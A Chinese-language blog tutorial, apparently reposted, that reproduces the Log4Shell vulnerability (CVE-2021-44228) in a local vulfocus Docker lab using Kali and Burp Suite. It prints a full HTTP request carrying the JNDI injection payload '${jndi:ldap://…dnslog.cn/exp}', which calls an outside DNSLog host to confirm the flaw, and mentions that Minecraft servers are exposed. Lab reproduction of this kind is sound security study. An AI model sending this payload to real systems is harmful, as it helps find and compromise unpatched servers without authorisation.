北京時間12月9號深夜,Apache Log4j2被曝出一個高危漏洞,攻擊者通過jndi注入攻擊的形式可以輕松遠程執行任何代碼,隨后官方緊急推出了2.15.0和2.15.0-rc1新版本修復,依然未能完全解決問題,現在已經更新到2.15.0-rc2(近日已推出2.16版本),該漏洞被命名為Log4Shell,編號CVE-2021-44228,相關地址NVD - CVE-2021-44228
本次漏洞復現采用vulfocus的log4j2靶場docker
使用Kali系統進行復現實驗
在Kali系統中并未默認安裝Docker,可以通過運行以下命令安裝
sudo apt-get update && sudo apt-get install docker docker docker-compose -y是否安裝完成Docker可以通過以下命令查看docker 版本
docker -v如下圖便已安裝完成
是否安裝完成Docker-compose可以通過以下命令查看docker-compose版本
docker-compose version如下圖便已安裝完成
之后,我們便可拉取相關鏡像靶場
在Vulfocus中有著許多靶場提供可以通過鏈接查看并學習Docker Hub
#開啟docker 的服務
service docker start
#拉取鏡像
docker pull vulfocus/log4j2-rce-2021-12-09通過以下命令查看拉取的鏡像
docker images如下圖便已拉取鏡像
接下來便是開啟Docker
用38080埠替換8080埠進行訪問服務
docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09接下來打開瀏覽器輸入URL:http://172.17.0.1:38080/hello
看到以下畫面便成功訪問了
接下來開啟BurpSuite,將網頁代理改為BurpSuite代理
用Repeater打開
接下來要對其提交內容進行修改
POST /hello HTTP/1.1
Host: 172.17.0.1:38080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://172.17.0.1:38080
DNT: 1
Connection: close
Referer:http://172.17.0.1:38080/hello
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
payload=${jndi:ldap://ts777b.dnslog.cn/exp}
其中ts777b.dnslog.cn這個地址自己生成URL:DNSLog Platform
按下Get SubDomain 便能夠生成你自己的DNSlog并將生成的地址替換進payload=${jndi:ldap://DNSLog/exp},然后發生資料給靶機,
回到DNSLog頁面重繪Refresh Record
便能查詢道靶機遞回查詢日志的記錄,
Log4J2漏洞的危害便是能夠遠程執行代碼,并且采用此框架件的廠商眾多,造成的危害面廣
《我的世界》(Minecraft)沙盒游戲便是采用之一,利用其聯機服務,便可以通過此CVE-2021-44228漏洞對其中主機進行權限獲取
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/386790.html
標籤:其他